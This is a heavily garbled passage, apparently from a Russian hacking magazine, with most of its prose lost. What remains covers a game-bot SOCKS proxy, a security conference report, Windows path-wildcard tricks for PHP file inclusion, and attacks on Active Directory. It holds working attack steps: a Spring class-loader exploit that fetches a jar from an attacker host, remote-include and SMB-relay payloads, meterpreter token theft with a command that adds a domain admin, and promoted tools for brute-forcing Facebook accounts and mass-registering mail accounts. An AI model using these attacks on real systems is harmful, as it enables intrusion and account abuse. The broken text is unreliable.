Internet Explorer' (httpwatch.com). , , Record , ,
2 . ,
, .
, , state : PHASE1, PHASE2, PHASE3, GUESS, LOSE.
: ,
, , ,
. , question_id, ,
, .
question_mask . ,
state=PHASE3, C, A,
???A. GUESS LOSE, , .
, question_mask :
, . .
.
. , ,
. question_id ,
, . ,
, state PHASE1, PHASE2 PHASE3.
, : , .

? . . .

.
, , ,
, .
WinPCap,
.
.
Internet Explorer. , ,
, , .
COM-: COM ( IWebBrowser2
Internet Explorer), .
,
, . -. , Socks 4/5 .
. ,
Socks-,
.
Socks- : faqs.org/rfcs/rfc1928.html.
. .
-,

The listening side of the proxy, at its simplest:

#include <winsock2.h>
SOCKET mysocket;
sockaddr_in local_addr;
local_addr.sin_family = AF_INET;
local_addr.sin_port = htons(MY_PORT);
local_addr.sin_addr.s_addr = 0;          // INADDR_ANY
mysocket = socket(AF_INET, SOCK_STREAM, 0);
bind(mysocket, (sockaddr *)&local_addr, sizeof(local_addr));
listen(mysocket, 1080);                  // the second argument is the backlog, not a port
SOCKET client_socket;
sockaddr_in client_addr;
int client_addr_size = sizeof(client_addr);
while ((client_socket = accept(mysocket, (sockaddr *)&client_addr, &client_addr_size)))
{
DWORD thID;
// hand the thread its own copy of the handle: the next accept() overwrites client_socket
SOCKET *arg = new SOCKET(client_socket);
CreateThread(NULL, NULL, ClientThread, arg, NULL, &thID);
}

One thread per client works, but on Windows it is more convenient to go asynchronous with WSAAsyncSelect().




The complete C++ source for Visual Studio 10 is on the DVD. Here is how the proxy's listening socket is set up in the asynchronous variant:

SOCKET server_socket;
WSADATA wsaData;
int server_port = 3128;
int queue_size = 5;
struct sockaddr_in server_address;
// window messages Winsock will post for socket events
#define SERVER_ACCEPT WM_USER + 1
#define CLIENT_EVENT WM_USER + 2
#define TARGET_EVENT WM_USER + 3
#define SOCKET_OPENED WM_USER + 4
#define SOCKET_CLOSED WM_USER + 5
int ServerStart(HWND hWnd)
{
int rc;
WSACleanup();
WSAStartup(0x0101, &wsaData);
server_socket = socket(AF_INET, SOCK_STREAM, 0);
server_address.sin_family = AF_INET;
server_address.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");   // listen on localhost only
server_address.sin_port = htons(server_port);
bind(server_socket, (LPSOCKADDR)&server_address, sizeof(server_address));
listen(server_socket, queue_size);
/* !!! */ rc = WSAAsyncSelect(server_socket, hWnd, SERVER_ACCEPT, FD_ACCEPT);
return 0;
}

What does the marked line do? WSAAsyncSelect switches the socket to non-blocking mode and asks Winsock to post the SERVER_ACCEPT message to the window hWnd whenever a client connects. The window procedure handles SERVER_ACCEPT by calling accept() and then subscribes the new client socket to CLIENT_EVENT for reads and closes:

client_socket = accept(server_socket, (LPSOCKADDR)&socket_record->client_address, &len);
rc = WSAAsyncSelect(socket_record->client_socket, hWnd, CLIENT_EVENT, FD_READ | FD_CLOSE);

A CLIENT_EVENT message carries the event type in lParam: FD_READ means data is waiting to be read, FD_CLOSE means the client has disconnected.

if(WSAGETSELECTEVENT(lParam) == FD_READ) {
c = recv(socket_record->client_socket, &bf[0], 1,0);
...
}
if(WSAGETSELECTEVENT(lParam) == FD_CLOSE) {
...
}

Now the protocol itself. Every SOCKS connection starts with a handshake; the description below is for SOCKS5, the SOCKS4 variant is simpler and is also in the RFC.
1. The client sends the protocol version (4 or 5) and the number N of authentication methods it supports, followed by N method bytes. In our case that is three bytes, 05h 01h 00h: version 5, one method, no authentication.
2. The server replies with two bytes: 05h and the method it selected, 00h for no authentication. Anything else means the client is expected to authenticate, which is not our case.
3. The client sends the request: 05h, the command (01h is CONNECT), a reserved 00h, the address type, the destination address and the destination port. For IPv4 the address type is 01h, the address is 4 bytes, and the port is 2 bytes in network order, i.e. high byte * 256 + low byte.
4. The proxy connects to that host and port, answers with a reply of the same layout (05h, 00h for success, 00h, address type, bound address, bound port), and from then on simply copies bytes between the client and the target in both directions.
That last step is the whole point: every byte the game client sends and receives now passes through our code, where it can be logged and modified before being forwarded.
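The two handshake messages above, parsed and answered over byte buffers rather than sockets so the logic can be tested offline: an added example, not the proxy from the DVD. It follows RFC 1928 for the IPv4 CONNECT case only, which is all the bot needs; the sample bytes in the test are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* What a CONNECT request asks for; IPv4 only, as in the text. */
struct socks5_connect {
    uint8_t ip[4];
    uint16_t port;      /* host order: high byte * 256 + low byte */
};

/* Greeting: VER=05h, NMETHODS, METHODS[]. Accept only "no authentication" (00h).
 * Fills the 2-byte reply (05h 00h, or 05h FFh for "no acceptable method").
 * Returns the number of bytes consumed, or -1 if the message is malformed. */
int socks5_handle_greeting(const uint8_t *in, size_t len, uint8_t reply[2])
{
    if (len < 2 || in[0] != 0x05)
        return -1;
    size_t nmethods = in[1];
    if (len < 2 + nmethods)
        return -1;
    int noauth = 0;
    for (size_t i = 0; i < nmethods; i++)
        if (in[2 + i] == 0x00)
            noauth = 1;
    reply[0] = 0x05;
    reply[1] = noauth ? 0x00 : 0xFF;
    return (int)(2 + nmethods);
}

/* Request: VER=05h, CMD, RSV=00h, ATYP, DST.ADDR, DST.PORT (network order).
 * Only CMD=01h (CONNECT) with ATYP=01h (IPv4) is handled. Builds the 10-byte
 * reply with the same layout: REP=00h succeeded, 07h command not supported,
 * 08h address type not supported. Returns 10 on success (out is filled),
 * 0 when an error reply was produced, -1 when the message is malformed. */
int socks5_handle_request(const uint8_t *in, size_t len,
                          struct socks5_connect *out, uint8_t reply[10])
{
    if (len < 4 || in[0] != 0x05)
        return -1;
    memset(reply, 0, 10);
    reply[0] = 0x05;
    reply[3] = 0x01;                 /* BND.ADDR as IPv4 0.0.0.0, BND.PORT 0 */
    if (in[1] != 0x01) { reply[1] = 0x07; return 0; }
    if (in[3] != 0x01) { reply[1] = 0x08; return 0; }
    if (len < 10)
        return -1;
    memcpy(out->ip, in + 4, 4);
    out->port = (uint16_t)(in[8] * 256 + in[9]);
    reply[1] = 0x00;                 /* a real proxy connects to the target first */
    return 10;
}

/* Method byte the server would select for a greeting, or -1 if malformed. */
int socks5_greeting_method(const uint8_t *in, size_t len)
{
    uint8_t reply[2];
    return socks5_handle_greeting(in, len, reply) < 0 ? -1 : reply[1];
}

/* Destination port of a CONNECT request, or -1 if it was not accepted. */
int socks5_request_port(const uint8_t *in, size_t len)
{
    struct socks5_connect c;
    uint8_t reply[10];
    return socks5_handle_request(in, len, &c, reply) == 10 ? c.port : -1;
}
```

In the asynchronous proxy these two functions are called from the FD_READ handler on the bytes accumulated so far; the return value tells how much of the buffer was consumed, and once the request has been answered with REP=00h the handler switches to plain relaying.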


, ,
FD_READ , ,
-, .
,
.
, , , . , ,
. ,
, ,
id. , LOSE GUESS
. ,
.
.
. , COM-
IWebBrowser2 Internet Explorera,
. Flash-
Flash API, . . .
Internet Explorer? ?
.
Input is injected with SendInput; keybd_event()/mouse_event() are deprecated by Microsoft. Pressing F5 (to reload the page) looks like this:

INPUT pInput = {0};                        // zero every field, including the unused ones
pInput.type = INPUT_KEYBOARD;
pInput.ki.wVk = VK_F5;
pInput.ki.time = 0;
pInput.ki.wScan = 0;
pInput.ki.dwFlags = KEYEVENTF_EXTENDEDKEY;  // key down; send again with KEYEVENTF_KEYUP to release
SendInput(1, &pInput, sizeof(pInput));

! Socks-, , ,
, . !
, , , . . ,
. ,
, ,
, .
- , , ,
.

.
. ,
. :

vkontakte.ru/app750611;
vkontakte.ru/app1697883;
vkontakte.ru/app1846666;
vkontakte.ru/app1831187;
.

.
vkontakte.ru/app707522.

, .
.
. : vkontakte.
ru/app716582.
,
, ,
.
, , ,
,
, ,
.

, .
, , ,
.

. , ,
.
. .

,
, , ,
.
. , , ,
, . (
, )
.

.
, . . . , ,
.
, . .
. ,
80- .
, . , ,
,
. z



sh2kerr dsecrg.ru

WELCOME
TO MALAYSIA!
HITB -

security-
Hack In The Box, 11 14 -.
: -, ;
-, ; -,

.
- HITB: 2003
. 7 HITB security-,
.
, .

ROP,
. HITB Linux
, NX, ASLR ASCII-Armor.
ROPME, ,
ROP- ROP ( ,
). ,
, .
The Grugq
, HITB. GSM-.
RACHell,
DoS GSM. IMSI

050

Flood VLR HLR,


. ,
Baseband- OpenBTS Coseinc GSM FuzzFarm.
- Sogeti ,
DRM- QuickTime iTunes.
, ,
, , , , .

.
, (
JailBreak) . , , . ,
, (
, :)), .
, Smartphones, Applications & Security ,
,
(
), ,
.

, ,


,

(
, ).

,
web2.0. Browser DOM. ,
.
,
, ,
(
),
.

DOM Stealing.
,
.
,
temp url-
:
temp = "login.do?user="+user+"&pwd="+pwd;
xmlhttp.open("GET",temp,true);
xmlhttp.onreadystatechange=function()

, document.body,
, ,
.
, DOM XSS
Flash- Silverlight, ... .
-
. HITB , ,
. Intel RTL (Register Transfer
Level). , - , ,
(
).
TEHTRISecurity. MITM- web.

.

SAP

web-, (), .
.
,
.

, . ,
,
. ,

. ,
, .
, , ,
.
,
.

.


,
,
. :
-
.
, , , -

.
, ,
, ,
-.
, ?

, .
:
VASTO , The Virtualization
Assessment Tolkit.
. ,
Vmware Version, soap 80
.

DVD
dvd



DVD

HTTP://WWW
links


conference.
hackinthebox.org/
hitbsecconf2010kul/
materials/


. : , ,

, ,
.
(VMware VI client) ,
, , ActiveX. .
:
<ConfigRoot>
<clientConnection id="0000">
<authdPort>902</authdPort>
<version>3</version>
<patchVersion>3.0.0</patchVersion>
<apiVersion>3.1.0</apiVersion>
<downloadurl>https://*/client/VMwareViclient.exe</downloadurl>
</clientConnection>
</ConfigRoot>

MITM,

.
url-, POST-
,
( IP-
).

, , .
, ,
, .
, .
, , ,
, .


ACROS. DLL Hijacking.
, ,
.
DLL Hijacking:

,


. Stuxnet SAP

, IM

DLL ZIP-
DLL ZIP USB
DLL ZIP CD

In short: when an exe is started through CreateProcess, a DLL it loads by name is searched for in this order:
1. the directory the application was started from;
2. the current working directory (CWD);
3. C:\windows\system32;
4. C:\windows\system;
5. C:\windows;
6. the directories in the system PATH, then in the user PATH.

. ,
ShellExecute ,
! ,
, , . ,
, DLL Hijacking
Binary planting ( ACROSS),
120 EXE planting.
ACROS Binary Planting Detector
( :)),
.
,
, . www.binaryplanting.
com
.

, ,
ps/2-, . , :
. , ,
.
, ,
, . .
,
.
, ,
. ,

-
,
.
, (, , ).
.
, ,
. , , .

, . . , Blackhat, 2000 .

. ,
, embended OS, ,
. , - ,
, , .
, ,
, ,
, . :
- . , , ,
,
.
. ,
: , .
: -: , .

,
url (, bit.ly). , ,
, ,
. : URL , . ,
. , .
VLC-. ,
. ,
, ,
- .
, ,
. , . .
<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
<title>Playlist</title>
<trackList>
<track>
<location>smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}</location>
<extension application="http://www.videolan.org/vlc/playlist/0">
<vlc:id>0</vlc:id>
</extension>
</track>
</trackList>
</playlist>

RAZ0R HTTP://RAZ0R.NAME

HITB
, : , ,
?.
HTML5
. , <Canvas>, ,
getimagedata(), -
. , ... , :).

,
Java

- .
smb-.
Alpha-numeric -.
url bit.ly.

<embed type="application/x-vlc-plugin"
width="320" height="200"
target="http://tinyurl.com/ycctrzf"
id="vlc" />

, , , - .
, , , XSS .
: 0day ie+java. , !
, ?
-. , -, . -
,
. , -

054

.
, . , Java ,
.
, Google,
. ,
Apache struts2, Spring JBoss Seam
.
Spring. MVC,
,
POST-. , ,
. , , POST:
POST /adduser HTTP/1.0
...
user.address.street= Disclosure+Str

:
frmObj.getUser().getAddress().setStreet(
"Disclosure Str.")

, :
POST /adduser HTTP/1.0
...
class.classLoader.URLs[0]=jar:http://attacker/springexploit.jar!/

The URL points at a jar on the attacker's server, and the class loader duly loads it.

, url
.
The jar carries a tag library descriptor, /META-INF/spring-form.tld, which defines the form:input and form:form tags:

<tag-file>
<name>input</name>
<path>/META-INF/tags/InputTag.tag</path>
</tag-file>
<tag-file>
<name>form</name>
<path>/META-INF/tags/InputTag.tag</path>
</tag-file>

The tag file is a JSP fragment, so Java code in it runs on the server the next time a page uses these tags. The proof of concept just creates a directory:

/META-INF/tags/InputTag.tag:
<%@ tag dynamic-attributes="dynattrs" %>
<%
java.lang.Runtime.getRuntime().exec("mkdir /tmp/PWNED");
%>

, ,
jsp-,
, -
DoS, , .


.
,
, .
, .
Java ,
Thinking
Java. , ,
DSECRG,
HITB
.

, , . ,
: HITB' lockpicking,
- . -
, .
( look.nl),
.
, ,
(, :)).

PS

Blackhat. ,
, , ,
! , , ( ) , . BlackHat

! z


UNIXOID

d0znp onsec.ru

!

PHP

. ,
,
.
-, php-...
- Error-based MySQL, unserialize -
.
.
- ,
file name truncated.
- , ,

, ,
.
, :
(
- ,
),
.

.

Fuzzing
...
,

056


: http://code.google.com/p/pasc2at/
wiki/SimplifiedChinese,

. ,
, .

:
<?php
// try every byte in place of the last character of "1.php"
// and print the ones for which the file still opens
for($i=0;$i<255;$i++)
{
$url = '1.ph'.chr($i);
$tmp = @file_get_contents($url);
if(!empty($tmp))
echo chr($i)."\r\n";
}
?>

,
,
win32 :).

google.translate,
.
On Windows the loop prints four variants that open the file: 1.phP, 1.php, 1.ph> and 1.ph<.

,
. ,
,
.
!
.
,
,
, , ?


Wiki.
, ...

.
:


The reason is FindFirstFile: it treats > as ? and < as *, with a twist: a lone < is not quite *, while << is (see the table of variants below). Microsoft's documentation says nothing about this.

Variants that open 1.php:
1.p<0 (a character after the wildcard)
1.p< (a trailing space)
1.p<"
1.p<.
1.p<<
1.p>>
1.p<>
1.p><
1.p<(p/P)
1.p>(p/P)
1.p(h/H)<
1.p(h/H)>
1.p(h/H)(p/P)


The second class of quirks concerns trailing characters: a name may end in any number of double quotes, spaces and dots and still resolve to the plain name. Check it:

<?php
// "test.php" followed by 10 quotes, 10 spaces and 10 dots still opens test.php
if (file_get_contents("test.php".str_repeat("\"",10).str_repeat(" ",10).str_repeat(".",10))) echo 1337;
?>

If this prints 1337, the filesystem layer silently stripped the tail.
,
- .
The same goes for directory separators: any mix of \, / and . components leads to the same file:
file\./.\.
file////.
file\\\.
file\\.//\/\/\/.

, :
, .
,
.

< >?

WINAPI

,
. :

MSDN

The FindFirstFile documentation page (msdn.microsoft.com/en-us/library/aa364418(v=vs.85).aspx) even carries a community note about >, < and ":

Bug?!
The characters of '<' and '>' are treated like wildcard by this function.
[MSFT] these are listed in the Naming A File topic as illegal characters in path and file names. That topic is being updated to make this clearer.
History
10/19/2007 xMartian
5/2/2008 Mark Amos MSFT

Known since 2007! And still there :). Now let us see what it means for PHP.

. ,
(MSDN )
, ,
WIN-.
FindFirstFile is reached from most PHP file functions (the list is below). The rules were checked with file_get_contents on Windows:

0. * and ? are wildcards for FindFirstFile, but PHP intercepts them itself, so they never reach the API.
1. < is passed to FindFirstFile as *, with the subtlety noted above: a lone < is not quite *, while << is exactly * (see the table). Example: include('shell<') is processed as shell* and opens the first match, which for a single file is the file itself.
2. > is passed to FindFirstFile as ?, i.e. any single character. Example: include('shell.p>p') is processed as shell.p?p and opens shell.php.
3. " is passed to FindFirstFile as a dot. Example: include('shell"php') is equivalent to include('shell.php').
4. A leading dot may be omitted: fopen("htaccess") opens .htaccess, and together with rule 1 so does fopen("h<<").
5. Trailing spaces, dots and double quotes are discarded, so a name that looks invalid or even empty still opens a file. Example: fopen("")
6. Names of the form \\server\share are UNC paths, so PHP will happily fetch a file from a remote SMB server even with allow_url_fopen=Off: an RFI after all. The price is the SMB timeout of about 4 seconds per attempt (mind max_execution_time; see also ][ 04.2010). Example: include('\\evilserver\shell.php')
7. \\.\ opens the device namespace, and .. traversal inside it can cross drives. Example: include('\\.\C:\my\file.php\..\..\..\D:\anotherfile.php').
8. A drive letter with no separator after the colon is a drive-relative path. Example: file_get_contents('C:boot.ini') is the same as file_get_contents('C:/boot.ini')
9. Every file also has a DOS 8.3 short name, generated from the long name and, on collisions, from a hash; it is a perfectly valid name for the file, and it depends on the other files in the directory. From the Microsoft documentation: Specifically, if more than four files use the same six-character root, additional file names are created by combining the first two characters of the file name with a four-character hash code and then appending a unique designator. A directory could have files named MYFAVO~1.DOC, MYFAVO~2.DOC, MYFAVO~3.DOC, and MYFAVO~4.DOC. Additional files with this root could be named MY3140~1.DOC, MY40C7~1.DOC, and MYEACC~1.DOC.
Example: for in.conf the DOS name was IND763~1.CON, so file_get_contents('<<D763<<') reads it! Short names are easier to hit with wildcards than long ones, which matters when a filter blocks part of the name.
10. PHP (both mod_php and php.exe) opens the DOS device names aux, con, prn, com1-9, lpt1-9 wherever they appear in a path, extension or not. Example: file_get_contents('C:/tmp/con.jpg') reads from the console CON until EOF, and file_put_contents('C:/tmp/con.jpg', chr(0x07)) makes the server beep :).

Dressing these up as innocuous-looking names is left as an exercise :).

HTTP://WWW links

FindFirstFile: msdn.microsoft.com/en-us/library/aa364418(v=vs.85).aspx;
naming files, paths and namespaces: msdn.microsoft.com/en-us/library/aa365247(v=vs.85).aspx;
Windows file systems: technet.microsoft.com/en-us/library/cc722482.aspx;
oxod.ru.

WARNING

Credit: M4g, snipper.ru.
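As an added example (not from the article, and not the real Win32 API), a portable C model of the name rewriting described in rules 1, 2, 3, 5 and 10, plus the check a PHP application should apply to a user-supplied file name before it reaches any file function. The model is built only from the documented rules and is meant for reasoning about inputs; the 8.3 short names of rule 9 are not modelled because they depend on the directory's contents.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Rule 5: trailing spaces, dots and double quotes are dropped. */
void strip_trailing(char *s)
{
    size_t n = strlen(s);
    while (n > 0 && (s[n - 1] == ' ' || s[n - 1] == '.' || s[n - 1] == '"'))
        s[--n] = '\0';
}

/* Rules 1-3: '<' -> '*', '>' -> '?', '"' -> '.'. In place. */
void map_wildcards(char *s)
{
    for (; *s; s++) {
        if (*s == '<') *s = '*';
        else if (*s == '>') *s = '?';
        else if (*s == '"') *s = '.';
    }
}

/* Normalize a user-supplied name the way the rules describe; out must hold
 * strlen(in)+1 bytes. Returns out. */
char *normalize_name(const char *in, char *out)
{
    strcpy(out, in);
    strip_trailing(out);
    map_wildcards(out);
    return out;
}

/* Case-insensitive match with '*' and '?', the pattern FindFirstFile sees. */
int glob_match(const char *pat, const char *name)
{
    while (*pat) {
        if (*pat == '*') {
            for (; *name; name++)
                if (glob_match(pat + 1, name)) return 1;
            return glob_match(pat + 1, name);
        }
        if (!*name) return 0;
        if (*pat != '?' && tolower((unsigned char)*pat) != tolower((unsigned char)*name))
            return 0;
        pat++; name++;
    }
    return *name == '\0';
}

/* Would the raw input open the given file once normalized? */
int input_opens(const char *input, const char *file_on_disk)
{
    char buf[260];
    if (strlen(input) >= sizeof buf) return 0;
    normalize_name(input, buf);
    return glob_match(buf, file_on_disk);
}

/* Rule 10: reserved DOS device names, with or without an extension. */
int is_device_name(const char *name)
{
    char stem[8];
    size_t n = 0;
    for (; name[n] && name[n] != '.' && n < sizeof stem - 1; n++)
        stem[n] = (char)tolower((unsigned char)name[n]);
    stem[n] = '\0';
    if (name[n] && name[n] != '.')       /* stem longer than any device name */
        return 0;
    if (!strcmp(stem, "aux") || !strcmp(stem, "con") || !strcmp(stem, "prn"))
        return 1;
    if (strlen(stem) == 4 && (!strncmp(stem, "com", 3) || !strncmp(stem, "lpt", 3)))
        return stem[3] >= '1' && stem[3] <= '9';
    return 0;
}

/* What the application should do: refuse any name the path layer would
 * reinterpret, before touching the disk. */
int name_is_safe(const char *input)
{
    size_t n = strlen(input);
    if (n == 0 || input[n - 1] == ' ' || input[n - 1] == '.' || input[n - 1] == '"')
        return 0;
    for (const char *p = input; *p; p++)
        if (strchr("<>\"*?:|\\/", *p))
            return 0;
    return !is_device_name(input);
}
```

The point of the model is the last function: a whitelist of characters plus the device-name check is short, and it is what a PHP script that builds paths from $_GET should run, rather than trying to enumerate the tricks.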



: ,

,
file_get_contents, , ,
PHP.
, ,
. .
:
fopen
file_get_contents
copy
parse_ini_file
readfile
file_put_contents
mkdir
tempnam
touch
move_uploaded_file
include(_once)
require(_once)
ZipArchive::open()

The whitepaper mentioned at the beginning also gives this combination:

test.php?a=../a<%00

where the < becomes * and the null byte cuts off whatever the script appends. And which functions are not affected? These:
:
rename
unlink
rmdir

, ? .

PoC:

Reading .htaccess via h<< (rules 4 and 1), or any file through its short name (rule 9), given vulnerable code like this:

<?php
// $_GET['a'] goes into the path unchecked; ".jpg" is appended
file_get_contents("/images/".$_GET['a'].".jpg");
?>

The appended extension is dealt with in the usual ways, and the resulting errors leak information as well:

Warning: include(/images/../a<) [function.include]: failed to open stream: Invalid argument in ...

Warning: include(/images/../a<) [function.include]: failed to open stream: Permission denied ...

, .
. (. ,
. SQL- ][ 12.2009).
SQL-.
,
. ,
. ,
.

, ,
web- (snipper.ru/view/18/maloizvestnye-sposoby-atakna-web-prilozheniya) 19 ,
, ,
. z

FindFirstFile MSDN . 2007 ...




Digital Security (a.sintsov@dsec.ru)

Figure: a domain controller with domain clients (Computer 1 to Computer 4), a switch and a network printer.

This article is about attacking Active Directory, the directory service of Windows networks.
, , ,

.

, , ,
. Active
Directory. , . ,
, , , , , .
( ), . . ,
, .
, ,
-

060

.
, , ,
. , , , Windows 2000/2003/2008, XP/Vista/7.
, , . ,
: ru.wikipedia.org/wiki/Active_Directory.

Sun: , . , ,
. .
, , . .
, : , , .

Client                                                   Server
(1) SMB_COM_NEGOTIATE Request                        ->
                                                     <- (2) SMB_COM_NEGOTIATE Response
(3) SMB_COM_SESSION_SETUP_ANDX Request 1             ->
    [NTLM NEGOTIATE_MESSAGE]
                                                     <- (4) SMB_COM_SESSION_SETUP_ANDX Response 1
                                                        [NTLM CHALLENGE_MESSAGE]
(5) SMB_COM_SESSION_SETUP_ANDX Request 2             ->
    [NTLM AUTHENTICATE_MESSAGE]
                                                     <- (6) SMB_COM_SESSION_SETUP_ANDX Response 2

NTLM challenge-response over SMB
. ( )
.
, ,
. :
, , ,
.
Wi-Fi , (,
, ).

. , , LAN
, -,
. , ,
,
.

. ,
... . ? ,
DNS-. , , , 53- . nmap.
, IP- DHCP, DNS-, nslookup
70% .
, , , .
, . ARP-
DNS. ARP-PING ,
IP- . ,
OSI .
, . , ARP-PING
:
: ,
?
3 : , ! ,
3!

The 0day Conficker used

,
ARP, MAC-
, IP-.
. nmap Cain&Abel.
, , :).
DNS,
. DNS. DNS . -
:
C:\> nslookup
Default Server: windomain.domain
Address: 192.168.1.33
>ls -d windomain.domain > file.txt

, file.txt IP-. ? 80%


,
(, SQL-). DNS ,
IP-,
ARP- (Cain ).
, .

( ) . ,
, ,
IPC$. .

. , , ,
:). , , . ,

(SID). , RID (
SID), .
, Cain&Abel,

(sid2user). , . nmap'.
. : (, radmin), (radmin/vnc).
-, ,
, , , . ,
,
.


Figure: the Windows access check. A process handle in the object table refers to a secured object; the access token (assigned when the user logs on, with its security IDs) is checked against the object's security descriptor (assigned when the object is created) and the ACEs of its DACL, yielding the granted access rights (read, write, execute) or access denied.
, ( /SNMP ).

. , ,
.
. ,
:). , .
,
, :
search ms0 -t great


Their output is well known. Remember Conficker and Stuxnet, which spread through ms08-067 and ms10-061: both holes are still found on internal networks, and both exploits still work :). The catch with ms10-061 is that it needs a reachable shared printer, so it is not always applicable.
,
, ,
- .
,
IDS, . , IDS
,
meterpreter ( ) . ,
?
, . . :
,
,
, ,
. , , ,

:).
, , ,
.


.
, ,
, .
, MSSQL 2000 sa:sa,
Oracle 9i system:manager. ,
. -
.
( ,
),
, , ,
.

HASH

.
? ,
. .
,
. ?
, , , .
, ?
. NT AUTHORITY\SYSTEM,
.
,
, . ,
, ,
getsystem.
, MS09-012, MS10-015
(KiTrap0D) . ,
, ( ).
,
, NTLM , . ? ? .
. ,
, -
. NTLM Chalenge
response . , ,
.

Figure: ARP spoofing. Alice (IP 10.0.0.7, MAC aa:aa:aa:aa:aa:aa) and Bob (IP 10.0.0.1, MAC bb:bb:bb:bb:bb:bb) sit on the same switch; the attacker (IP 10.0.0.3, MAC cc:cc:cc:cc:cc:cc) poisons both ARP caches so that Alice's entry for 10.0.0.1 and Bob's entry for 10.0.0.7 both point to cc:cc:cc:cc:cc:cc, and all traffic between them flows through the attacker. Cain&Abel uses the same technique for DNS spoofing.
90-, . , ,
.
aka toxa: securitylab.ru/analytics/362448.php.
. , ,
- SQL -. MSSQL, SA.
, xp_cmdshell
meterpreter, SYSTEM.

, .
, ,
LSA,
. SAM-.
gsecdump wce,
.
, , , -.
,
. , MS10061.
ms10_061_spoolss>set SMBUser user
ms10_061_spoolss>set SMBDomain DOMAIN
ms10_061_spoolss>set SMBPass 01010101010101010101010101010101:01010101010101010101010101010101

MS10-061, ,
-, .
, .
, - ,
, .
,
, . . -
-,
SeImpersonate
( MS09-012, ).
:
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token DOMAIN\\admin

, ,
. ,
. , :
meterpreter> shell
C:\windows\system32\>net user xakep p4sSw_0Rd /ADD /DOMAIN
C:\windows\system32\>net group "Domain Admins" xakep /ADD /DOMAIN

,
(, , ).
: , ,

, ...

SMB-RELAY

( ) ,
, .
, , , WSUS
. , ,
.
. - . , gsecdump:
LSA-, . . ,
ERP-,

. , SQL-. ,
. MSSQL,
Microsoft , Oracle .

,
. ,
SMB-RELAY xp_dirtree/xp_fileexist (
). /
. , UNC,
. ,
, NTLM
chalenge response , - ,
, .

SMB-RELAY ( ). , (, ,
). ,
, ,


ARP-SPOOFING + RDP MitM


, , . , . ,
( , SYSTEM). ,
,
( )? ,
,
MS08-068. . :
, , MS08-068
,
.
. XSS
, :
<img src="\\attacker\shara">

, ,
SMB-RELAY .

. ARP-SPOOFING

ARP-SPOOFING
. ARP-
.
, IP-
. , IP-
.
, .
.
Cain&Abel Ettercap.
: ( ), -
, ARP-SPOOFING -
( , -) <img src="\\attacker\shara">.
SMB-RELAY .
Ettercap, SMB-RELAY .


.
, -,
, - .
,
ARP-.
. , ,
RDP,
, ,
. , Cain RDP- . Cain' (irongeek.com/downloads/
cain-RDP-parser.zip) .
...

? ?
,
( ).
- ARPSPOOFING, SMB-RELAY, Token', HASH-and-PASS
. ,
,
.
.
, . , , :
, ,
. ,
, , DNS
.
. ,
- bankclient-1
, . ,
( , , ), bankclient-1 .
... z


icq 884888, http://snipper.ru

X-TOOLS

X11.
, , : , CPU (i2c), MPD , CPU usage, ,
:)
:

: Evalhook 0.1
: *nix/win
: Stefan Esser

: uname,
, CPU, ,
;
IMAP POP3;

(MPD, XMMS2, BMPx, Audacious);

Lua
;
Imlib2 Cairo;
,
, .

Evalhook
,
php-,

- . ,
php-
, , :
<?php
/* Demo by www.php-crypt.com */
$keystroke1 = base64_decode("d2RyMTU5c
3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJ
tcA==");
...
?>

? PHP Evalhook
.
,
PHP extension,
, , , , .

eval
.
:
<?php
array_map('assert',
array('phpinfo()'));
?>

,
"phpinfo()":
Script tries to evaluate the following string.
----
return phpinfo() ;
----
Do you want to allow execution? [y/N]

On *nix Evalhook is built like any other PHP extension:
1. You need PHP >= 5.2 with php-devel, and no Zend Optimizer loaded;
2. The run.sh script does the following:
tar xvfz evalhook-0.1.tar.gz
cd evalhook
phpize
./configure
make
sudo make install
3. Run it: sh run.sh.
After that Evalhook is installed. To run an encoded script under it: php -d extension=evalhook.so _.php. More details: php-security.org/2010/05/13/article-decoding-a-user-spaceencoded-php-script.

: Conky
: *nix
: brenden1, joemyre, pkovacs

Conky!
, Conky ,


:
Debian/Ubuntu:
sudo apt-get install conky
zcat /usr/share/doc/conky/examples/conkyrc.sample.gz > ~/.conkyrc
Gentoo:
emerge app-admin/conky
FreeBSD:
cd /usr/ports/sysutils/conky && make install clean
From source (needs the X11 headers):
$ ./configure
$ make
# make install


.
1. Copy the sample config: zcat /usr/share/doc/conky/examples/conkyrc.sample.gz > ~/.conkyrc;
2. Open it in an editor (vim, say): vim ~/.conkyrc.
3. Add the widgets you want, for example a download graph: ${downspeedgraph rl0 32,155 104E8B 0077ff}, where
rl0 is the interface;
32 the height;
155 the width;
104E8B the first gradient colour;
0077ff the second gradient colour.

mail.ru

4. Reload the config: killall -SIGUSR1 conky.


, .
Conky:
1. exec , ;
2. execbar execgraph
;
3. execi texeci
;
4. if_running, if_existing if_mounted endif,
,
;
5. else ,
.
,

conky.
sourceforge.net.

: OWASP HTTP Post


Tool
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Tom Brenann

OWASP 2010 Application Security


Conference, ,
,
HTTP
,
- HTTP POST .
, 2009
, Proactive Risk
,

,
HTTP POST DDoS. , HTTP ,
-
. -,
( .
.), .
DDoS-,
,
,
, , . HTTP POST
POST-,

, , ,
(
).
,
HTTP
POST,
.
DDoS-
OWASP owasp.org/images/4/43/
Layer_7_DDOS.pdf,
HTTP POST
OWASP HTTP Post
Tool. .
, URL ,
, , ,
User-Agent,
POST.

www.
owasp.org/index.php/OWASP_HTTP_Post_Tool.

: Facebook Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Zdez Bil Ya

Facebook.com
grabberz.com Zdez Bil Ya.
:
SOCKS4/SOCKS5;

(, , PPS, );
+
( ,
);
+
;

;;

.

:
10 000
.
grabberz.com/
showthread.php?t=26298.

: Mail.ru Registrator 4
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Zdez Bil Ya

Zdez Bil Ya
mail.ru ( mail.ru, bk.ru, list.ru,
inbox.ru).

,
(antigate.com).

:

( );

( );
(
@).


:

(
);
;
;
(mail.ru, list.ru, bk.ru,
inbox.ru);
( );
(
);
(HTTP,
SOCKS4 SOCKS5);
,
;
;

( name.txt,
family.txt);
(
./
avatars).


accounts.txt
email@domain;password.

